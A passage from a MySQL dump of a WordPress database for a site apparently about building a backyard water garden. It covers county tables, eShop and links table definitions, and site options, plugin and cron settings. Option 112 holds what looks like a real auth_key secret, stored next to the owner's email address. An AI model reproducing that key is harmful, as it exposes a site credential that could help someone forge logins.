Yorkshire',1,'GB'),(107,'Wilt','Wiltshire',1,'GB'),(108,'Worc','Worcestershire',1,'GB'),(109,'Flin','Flintshire',1,'GB'),(110,'Glam','Glamorgan',1,'GB'),(111,'Meri','Merionethshire',1,'GB'),(112,'Mon','Monmouthshire',1,'GB'),(113,'Mont','Montgomeryshire',1,'GB'),(114,'Pemb','Pembrokeshire',1,'GB'),(115,'Radn','Radnorshire',1,'GB'),(116,'Angl','Anglesey',1,'GB'),(117,'Brec','Breconshire',1,'GB'),(118,'Caer','Caernarvonshire',1,'GB'),(119,'Card','Cardiganshire',1,'GB'),(120,'Carm','Carmarthenshire',1,'GB'),(121,'Denb','Denbighshire',1,'GB'),(122,'Kirk','Kirkcudbrightshire',1,'GB'),(123,'Lana','Lanarkshire',1,'GB'),(124,'Midl','Midlothian',1,'GB'),(125,'Mora','Moray',1,'GB'),(126,'Nair','Nairnshire',1,'GB'),(127,'Orkn','Orkney',1,'GB'),(128,'Peeb','Peebleshire',1,'GB'),(129,'Pert','Perthshire',1,'GB'),(130,'Renf','Renfrewshire',1,'GB'),(131,'Ross','Ross & Cromarty',1,'GB'),(132,'Roxb','Roxburghshire',1,'GB'),(133,'Selk','Selkirkshire',1,'GB'),(134,'Shet','Shetland',1,'GB'),(135,'Stir','Stirlingshire',1,'GB'),(136,'Suth','Sutherland',1,'GB'),(137,'WLot','West Lothian',1,'GB'),(138,'Wigt','Wigtownshire',1,'GB'),(139,'Aber','Aberdeenshire',1,'GB'),(140,'Angu','Angus',1,'GB'),(141,'Argy','Argyll',1,'GB'),(142,'Ayrs','Ayrshire',1,'GB'),(143,'Banf','Banffshire',1,'GB'),(144,'Berw','Berwickshire',1,'GB'),(145,'Bute','Bute',1,'GB'),(146,'Cait','Caithness',1,'GB'),(147,'Clac','Clackmannanshire',1,'GB'),(148,'Dumf','Dumfriesshire',1,'GB'),(149,'Dumb','Dumbartonshire',1,'GB'),(150,'ELot','East Lothian',1,'GB'),(151,'Fife','Fife',1,'GB'),(152,'Inve','Inverness',1,'GB'),(153,'Kinc','Kincardineshire',1,'GB'),(154,'Kinr','Kinross-shire',1,'GB'); /*!40000 ALTER TABLE `wp_eshop_states` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_stock` -- DROP TABLE IF EXISTS `wp_eshop_stock`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_stock` ( `id` int(11) NOT NULL auto_increment, `post_id` int(11) NOT NULL default '0', `option_id` int(11) NOT NULL default '0', `available` int(11) NOT NULL default '0', `purchases` int(11) NOT NULL default '0', PRIMARY KEY (`id`), KEY `post_id` (`post_id`,`available`,`purchases`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_stock` -- LOCK TABLES `wp_eshop_stock` WRITE; /*!40000 ALTER TABLE `wp_eshop_stock` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_stock` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_links` -- DROP TABLE IF EXISTS `wp_links`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_links` ( `link_id` bigint(20) unsigned NOT NULL auto_increment, `link_url` varchar(255) NOT NULL default '', `link_name` varchar(255) NOT NULL default '', `link_image` varchar(255) NOT NULL default '', `link_target` varchar(25) NOT NULL default '', `link_description` varchar(255) NOT NULL default '', `link_visible` varchar(20) NOT NULL default 'Y', `link_owner` bigint(20) unsigned NOT NULL default '1', `link_rating` int(11) NOT NULL default '0', `link_updated` datetime NOT NULL default '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL default '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL default '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_links` -- LOCK TABLES `wp_links` WRITE; /*!40000 ALTER TABLE `wp_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_options` -- DROP TABLE IF EXISTS `wp_options`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_options` ( `option_id` bigint(20) unsigned NOT NULL auto_increment, `option_name` varchar(64) NOT NULL default '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL default 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`) ) ENGINE=MyISAM AUTO_INCREMENT=772 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_options` -- LOCK TABLES `wp_options` WRITE; /*!40000 ALTER TABLE `wp_options` DISABLE KEYS */; INSERT INTO `wp_options` VALUES (1,'siteurl','http://wpclass.thegammonpress.com/ed2goclass','yes'),(2,'blogname','Build a Backyard Water Garden','yes'),(3,'blogdescription','','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','Gammon_Press@msn.com','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','0','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','10','yes'),(12,'rss_use_excerpt','0','yes'),(13,'mailserver_url','127.0.0.1','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','1','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','0','yes'),(21,'posts_per_page','10','yes'),(22,'date_format','F j, Y','yes'),(23,'time_format','g:i a','yes'),(24,'links_updated_date_format','F j, Y g:i a','yes'),(25,'links_recently_updated_prepend','<em>','yes'),(26,'links_recently_updated_append','</em>','yes'),(27,'links_recently_updated_time','120','yes'),(28,'comment_moderation','0','yes'),(29,'moderation_notify','1','yes'),(30,'permalink_structure','/%category%/%postname%/','yes'),(31,'gzipcompression','0','yes'),(32,'hack_file','0','yes'),(33,'blog_charset','UTF-8','yes'),(34,'moderation_keys','','no'),(35,'active_plugins','a:8:{i:0;s:41:\"all-in-one-favicon/all-in-one-favicon.php\";i:1;s:26:\"backupwordpress/plugin.php\";i:2;s:35:\"display-widgets/display-widgets.php\";i:3;s:15:\"eshop/eshop.php\";i:4;s:19:\"jetpack/jetpack.php\";i:5;s:35:\"si-contact-form/si-contact-form.php\";i:6;s:21:\"sociable/sociable.php\";i:7;s:17:\"wassup/wassup.php\";}','yes'),(36,'home','http://wpclass.thegammonpress.com/ed2goclass','yes'),(37,'category_base','','yes'),(38,'ping_sites','http://rpc.pingomatic.com/','yes'),(39,'advanced_edit','0','yes'),(40,'comment_max_links','2','yes'),(41,'gmt_offset','','yes'),(42,'default_email_category','1','yes'),(43,'recently_edited','a:5:{i:0;s:86:\"/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/themes/Marina/style.css\";i:1;s:86:\"/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/themes/Marina/index.php\";i:3;s:84:\"/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/themes/Marina/404.php\";i:4;s:84:\"/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/themes/Marina/tab.php\";i:5;s:88:\"/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/themes/Marina/sidebar.php\";}','no'),(44,'template','Marina','yes'),(45,'stylesheet','Marina','yes'),(46,'comment_whitelist','1','yes'),(47,'blacklist_keys','','no'),(48,'comment_registration','0','yes'),(49,'html_type','text/html','yes'),(50,'use_trackback','0','yes'),(51,'default_role','subscriber','yes'),(52,'db_version','22441','yes'),(53,'uploads_use_yearmonth_folders','1','yes'),(54,'upload_path','','yes'),(55,'blog_public','0','yes'),(56,'default_link_category','2','yes'),(57,'show_on_front','posts','yes'),(58,'tag_base','','yes'),(59,'show_avatars','1','yes'),(60,'avatar_rating','G','yes'),(61,'upload_url_path','','yes'),(62,'thumbnail_size_w','150','yes'),(63,'thumbnail_size_h','150','yes'),(64,'thumbnail_crop','1','yes'),(65,'medium_size_w','300','yes'),(66,'medium_size_h','300','yes'),(67,'avatar_default','mystery','yes'),(68,'large_size_w','1024','yes'),(69,'large_size_h','1024','yes'),(70,'image_default_link_type','file','yes'),(71,'image_default_size','','yes'),(72,'image_default_align','','yes'),(73,'close_comments_for_old_posts','0','yes'),(74,'close_comments_days_old','14','yes'),(75,'thread_comments','1','yes'),(76,'thread_comments_depth','5','yes'),(77,'page_comments','0','yes'),(78,'comments_per_page','50','yes'),(79,'default_comments_page','newest','yes'),(80,'comment_order','asc','yes'),(81,'sticky_posts','a:0:{}','yes'),(82,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(83,'widget_text','a:0:{}','yes'),(84,'widget_rss','a:2:{i:2;a:8:{s:5:\"title\";s:17:\"Water Garden News\";s:3:\"url\";s:50:\"http://www.water-garden-guide.com/Water-Garden.xml\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;s:10:\"dw_include\";i:0;s:9:\"other_ids\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(85,'uninstall_plugins','a:2:{s:35:\"si-contact-form/si-contact-form.php\";s:24:\"si_contact_unset_options\";s:41:\"all-in-one-favicon/all-in-one-favicon.php\";a:2:{i:0;s:15:\"AllInOneFavicon\";i:1;s:19:\"uninstallAioFavicon\";}}','no'),(86,'timezone_string','America/New_York','yes'),(87,'page_for_posts','0','yes'),(88,'page_on_front','0','yes'),(89,'default_post_format','0','yes'),(90,'link_manager_enabled','0','yes'),(91,'initial_db_version','22441','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:5:\"eShop\";b:1;s:11:\"eShop_admin\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:5:\"eShop\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'_transient_random_seed','cd82d77262f7171527b5cd48e2787045','yes'),(94,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:3:{s:5:\"title\";s:17:\"Water Garden Tips\";s:6:\"number\";i:5;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:7:{i:0;s:14:\"eshopwi_cart-2\";i:1;s:14:\"recent-posts-2\";i:2;s:5:\"rss-2\";i:3;s:17:\"recent-comments-2\";i:4;s:10:\"archives-2\";i:5;s:12:\"categories-2\";i:6;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'jetpack_activated','3','yes'),(102,'cron','a:7:{i:1423693884;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1423699200;a:1:{s:11:\"eshop_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423722686;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1423760884;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423766596;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423800000;a:1:{s:19:\"hmbkp_schedule_hook\";a:2:{s:32:\"61a45f8e0e711228d9f0aa04271d0a05\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:1:{s:2:\"id\";s:9:\"default-2\";}s:8:\"interval\";i:604800;}s:32:\"887abd106b36605fbb285d0dec9f47ac\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:1:{s:2:\"id\";s:9:\"default-1\";}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(112,'auth_key','o]U&L)SM[?^sd+nUR&*/jE2QEI1G[bTh~b#Xc[MfVsAb |_c2r%F)Us{(}Ro`=$@','yes'),(104,'_site_transient_update_core','O:8:\"stdClass\":3:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":9:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:56:\"http://downloads.wordpress.org/release/wordpress-4.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":4:{s:4:\"full\";s:56:\"http://downloads.wordpress.org/release/wordpress-4.1.zip\";s:10:\"no_content\";s:67:\"http://downloads.wordpress.org/release/wordpress-4.1-no-content.zip\";s:11:\"new_bundled\";s:68:\"http://downloads.wordpress.org/release/wordpress-4.1-new-bundled.zip\";s:7:\"partial\";b:0;}s:7:\"current\";s:3:\"4.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1423691548;s:15:\"version_checked\";s:5:\"3.5.1\";}','yes'),(355,'si_contact_form','a:193:{s:9:\"form_name\";s:0:\"\";s:7:\"welcome\";s:41:\"<p>Comments or questions are welcome.</p>\";s:8:\"email_to\";s:30:\"Webmaster,Gammon_Press@msn.com\";s:17:\"php_mailer_enable\";s:9:\"wordpress\";s:10:\"email_from\";s:0:\"\";s:19:\"email_from_enforced\";s:5:\"false\";s:14:\"email_reply_to\";s:0:\"\";s:9:\"email_bcc\";s:0:\"\";s:13:\"email_subject\";s:38:\"Build a Backyard Water Garden Contact:\";s:18:\"email_subject_list\";s:0:\"\";s:11:\"name_format\";s:4:\"name\";s:9:\"name_type\";s:8:\"required\";s:10:\"email_type\";s:8:\"required\";s:12:\"subject_type\";s:8:\"required\";s:12:\"message_type\";s:8:\"required\";s:21:\"preserve_space_enable\";s:5:\"false\";s:10:\"max_fields\";s:1:\"4\";s:12:\"double_email\";s:5:\"false\";s:16:\"name_case_enable\";s:5:\"false\";s:18:\"sender_info_enable\";s:4:\"true\";s:14:\"domain_protect\";s:4:\"true\";s:15:\"email_check_dns\";s:5:\"false\";s:10:\"email_html\";s:5:\"false\";s:15:\"akismet_disable\";s:5:\"false\";s:19:\"akismet_send_anyway\";s:4:\"true\";s:14:\"captcha_enable\";s:4:\"true\";s:13:\"captcha_small\";s:5:\"false\";s:18:\"captcha_difficulty\";s:6:\"medium\";s:16:\"captcha_no_trans\";s:5:\"false\";s:12:\"enable_audio\";s:4:\"true\";s:18:\"enable_audio_flash\";s:5:\"false\";s:12:\"captcha_perm\";s:5:\"false\";s:18:\"captcha_perm_level\";s:4:\"read\";s:15:\"honeypot_enable\";s:5:\"false\";s:15:\"redirect_enable\";s:4:\"true\";s:16:\"redirect_seconds\";s:1:\"3\";s:12:\"redirect_url\";s:44:\"http://wpclass.thegammonpress.com/ed2goclass\";s:14:\"redirect_query\";s:5:\"false\";s:15:\"redirect_ignore\";s:0:\"\";s:15:\"redirect_rename\";s:0:\"\";s:12:\"redirect_add\";s:0:\"\";s:18:\"redirect_email_off\";s:5:\"false\";s:11:\"silent_send\";s:3:\"off\";s:10:\"silent_url\";s:0:\"\";s:13:\"silent_ignore\";s:0:\"\";s:13:\"silent_rename\";s:0:\"\";s:10:\"silent_add\";s:0:\"\";s:16:\"silent_email_off\";s:5:\"false\";s:13:\"export_enable\";s:4:\"true\";s:13:\"export_ignore\";s:0:\"\";s:13:\"export_rename\";s:0:\"\";s:10:\"export_add\";s:0:\"\";s:16:\"export_email_off\";s:5:\"false\";s:19:\"ex_fields_after_msg\";s:5:\"false\";s:11:\"date_format\";s:10:\"mm/dd/yyyy\";s:13:\"cal_start_day\";s:1:\"0\";s:11:\"time_format\";s:2:\"12\";s:12:\"attach_types\";s:28:\"doc,pdf,txt,gif,jpg,jpeg,png\";s:11:\"attach_size\";s:3:\"1mb\";s:19:\"textarea_html_allow\";s:5:\"false\";s:17:\"enable_areyousure\";s:5:\"false\";s:19:\"auto_respond_enable\";s:5:\"false\";s:17:\"auto_respond_html\";s:5:\"false\";s:22:\"auto_respond_from_name\";s:9:\"WordPress\";s:23:\"auto_respond_from_email\";s:20:\"Gammon_Press@msn.com\";s:21:\"auto_respond_reply_to\";s:20:\"Gammon_Press@msn.com\";s:20:\"auto_respond_subject\";s:0:\"\";s:20:\"auto_respond_message\";s:0:\"\";s:26:\"req_field_indicator_enable\";s:4:\"true\";s:22:\"req_field_label_enable\";s:4:\"true\";s:19:\"req_field_indicator\";s:2:\" *\";s:13:\"border_enable\";s:5:\"false\";s:10:\"form_style\";s:12:\"width:375px;\";s:12:\"border_style\";s:37:\"border:1px solid black; padding:10px;\";s:14:\"required_style\";s:16:\"text-align:left;\";s:11:\"notes_style\";s:16:\"text-align:left;\";s:11:\"title_style\";s:33:\"text-align:left; padding-top:5px;\";s:11:\"field_style\";s:26:\"text-align:left; margin:0;\";s:15:\"field_div_style\";s:16:\"text-align:left;\";s:11:\"error_style\";s:27:\"text-align:left; color:red;\";s:12:\"select_style\";s:16:\"text-align:left;\";s:20:\"captcha_div_style_sm\";s:42:\"width:175px; height:50px; padding-top:2px;\";s:19:\"captcha_div_style_m\";s:42:\"width:250px; height:65px; padding-top:2px;\";s:19:\"captcha_input_style\";s:38:\"text-align:left; margin:0; width:50px;\";s:16:\"submit_div_style\";s:33:\"text-align:left; padding-top:2px;\";s:12:\"button_style\";s:25:\"cursor:pointer; margin:0;\";s:11:\"reset_style\";s:25:\"cursor:pointer; margin:0;\";s:16:\"powered_by_style\";s:55:\"font-size:x-small; font-weight:normal; padding-top:5px;\";s:14:\"redirect_style\";s:16:\"text-align:left;\";s:10:\"field_size\";s:2:\"40\";s:18:\"captcha_field_size\";s:1:\"6\";s:9:\"text_cols\";s:2:\"30\";s:9:\"text_rows\";s:2:\"10\";s:13:\"aria_required\";s:5:\"false\";s:16:\"auto_fill_enable\";s:4:\"true\";s:12:\"title_border\";s:13:\"Contact Form:\";s:10:\"title_dept\";s:0:\"\";s:12:\"title_select\";s:0:\"\";s:10:\"title_name\";s:0:\"\";s:11:\"title_fname\";s:0:\"\";s:11:\"title_mname\";s:0:\"\";s:12:\"title_miname\";s:0:\"\";s:11:\"title_lname\";s:0:\"\";s:11:\"title_email\";s:0:\"\";s:12:\"title_email2\";s:0:\"\";s:17:\"title_email2_help\";s:0:\"\";s:10:\"title_subj\";s:0:\"\";s:10:\"title_mess\";s:0:\"\";s:10:\"title_capt\";s:0:\"\";s:12:\"title_submit\";s:0:\"\";s:11:\"title_reset\";s:0:\"\";s:16:\"title_areyousure\";s:0:\"\";s:17:\"text_message_sent\";s:0:\"\";s:16:\"tooltip_required\";s:0:\"\";s:15:\"tooltip_captcha\";s:0:\"\";s:13:\"tooltip_audio\";s:0:\"\";s:15:\"tooltip_refresh\";s:0:\"\";s:17:\"tooltip_filetypes\";s:0:\"\";s:16:\"tooltip_filesize\";s:0:\"\";s:12:\"enable_reset\";s:5:\"false\";s:18:\"enable_credit_link\";s:5:\"false\";s:20:\"error_contact_select\";s:0:\"\";s:10:\"error_name\";s:0:\"\";s:11:\"error_email\";s:0:\"\";s:12:\"error_email2\";s:0:\"\";s:11:\"error_field\";s:0:\"\";s:13:\"error_subject\";s:0:\"\";s:13:\"error_message\";s:0:\"\";s:11:\"error_input\";s:0:\"\";s:19:\"error_captcha_blank\";s:0:\"\";s:19:\"error_captcha_wrong\";s:0:\"\";s:13:\"error_correct\";s:0:\"\";s:13:\"error_spambot\";s:0:\"\";s:13:\"vcita_enabled\";s:4:\"true\";s:14:\"vcita_approved\";s:5:\"false\";s:9:\"vcita_uid\";s:0:\"\";s:11:\"vcita_email\";s:0:\"\";s:20:\"vcita_confirm_tokens\";s:0:\"\";s:17:\"vcita_initialized\";s:4:\"true\";s:16:\"vcita_first_name\";s:0:\"\";s:15:\"vcita_last_name\";s:0:\"\";s:17:\"ex_field1_default\";s:1:\"0\";s:22:\"ex_field1_default_text\";s:0:\"\";s:13:\"ex_field1_req\";s:5:\"false\";s:15:\"ex_field1_label\";s:0:\"\";s:14:\"ex_field1_type\";s:4:\"text\";s:17:\"ex_field1_max_len\";s:0:\"\";s:19:\"ex_field1_label_css\";s:0:\"\";s:19:\"ex_field1_input_css\";s:0:\"\";s:20:\"ex_field1_attributes\";s:0:\"\";s:15:\"ex_field1_regex\";s:0:\"\";s:21:\"ex_field1_regex_error\";s:0:\"\";s:15:\"ex_field1_notes\";s:0:\"\";s:21:\"ex_field1_notes_after\";s:0:\"\";s:17:\"ex_field2_default\";s:1:\"0\";s:22:\"ex_field2_default_text\";s:0:\"\";s:13:\"ex_field2_req\";s:5:\"false\";s:15:\"ex_field2_label\";s:0:\"\";s:14:\"ex_field2_type\";s:4:\"text\";s:17:\"ex_field2_max_len\";s:0:\"\";s:19:\"ex_field2_label_css\";s:0:\"\";s:19:\"ex_field2_input_css\";s:0:\"\";s:20:\"ex_field2_attributes\";s:0:\"\";s:15:\"ex_field2_regex\";s:0:\"\";s:21:\"ex_field2_regex_error\";s:0:\"\";s:15:\"ex_field2_notes\";s:0:\"\";s:21:\"ex_field2_notes_after\";s:0:\"\";s:17:\"ex_field3_default\";s:1:\"0\";s:22:\"ex_field3_default_text\";s:0:\"\";s:13:\"ex_field3_req\";s:5:\"false\";s:15:\"ex_field3_label\";s:0:\"\";s:14:\"ex_field3_type\";s:4:\"text\";s:17:\"ex_field3_max_len\";s:0:\"\";s:19:\"ex_field3_label_css\";s:0:\"\";s:19:\"ex_field3_input_css\";s:0:\"\";s:20:\"ex_field3_attributes\";s:0:\"\";s:15:\"ex_field3_regex\";s:0:\"\";s:21:\"ex_field3_regex_error\";s:0:\"\";s:15:\"ex_field3_notes\";s:0:\"\";s:21:\"ex_field3_notes_after\";s:0:\"\";s:17:\"ex_field4_default\";s:1:\"0\";s:22:\"ex_field4_default_text\";s:0:\"\";s:13:\"ex_field4_req\";s:5:\"false\";s:15:\"ex_field4_label\";s:0:\"\";s:14:\"ex_field4_type\";s:4:\"text\";s:17:\"ex_field4_max_len\";s:0:\"\";s:19:\"ex_field4_label_css\";s:0:\"\";s:19:\"ex_field4_input_css\";s:0:\"\";s:20:\"ex_field4_attributes\";s:0:\"\";s:15:\"ex_field4_regex\";s:0:\"\";s:21:\"ex_field4_regex_error\";s:0:\"\";s:15:\"ex_field4_notes\";s:0:\"\";s:21:\"ex_field4_notes_after\";s:0:\"\";}','yes'),(770,'_site_transient_timeout_theme_roots','1423693348','yes'),(771,'_site_transient_theme_roots','a:18:{s:6:\"Marina\";s:7:\"/themes\";s:6:\"ahimsa\";s:7:\"/themes\";s:7:\"arclite\";s:7:\"/themes\";s:11:\"arras-theme\";s:7:\"/themes\";s:9:\"atahualpa\";s:7:\"/themes\";s:20:\"cordobo-green-park-2\";s:7:\"/themes\";s:5:\"corp2\";s:7:\"/themes\";s:6:\"fusion\";s:7:\"/themes\";s:13:\"grayCorporate\";s:7:\"/themes\";s:5:\"inove\";s:7:\"/themes\";s:14:\"lightspersonal\";s:7:\"/themes\";s:9:\"lightword\";s:7:\"/themes\";s:10:\"monochrome\";s:7:\"/themes\";s:15:\"orangeCorporate\";s:7:\"/themes\";s:5:\"pixel\";s:7:\"/themes\";s:5:\"trees\";s:7:\"/themes\";s:12:\"twentyeleven\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}','yes'),(197,'_site_transient_update_themes','O:8:\"stdClass\":3:{s:12:\"last_checked\";i:1423691549;s:7:\"checked\";a:18:{s:6:\"Marina\";s:0:\"\";s:6:\"ahimsa\";s:3:\"3.2\";s:7:\"arclite\";s:4:\"2.02\";s:11:\"arras-theme\";s:5:\"1.3.5\";s:9:\"atahualpa\";s:6:\"3.7.11\";s:20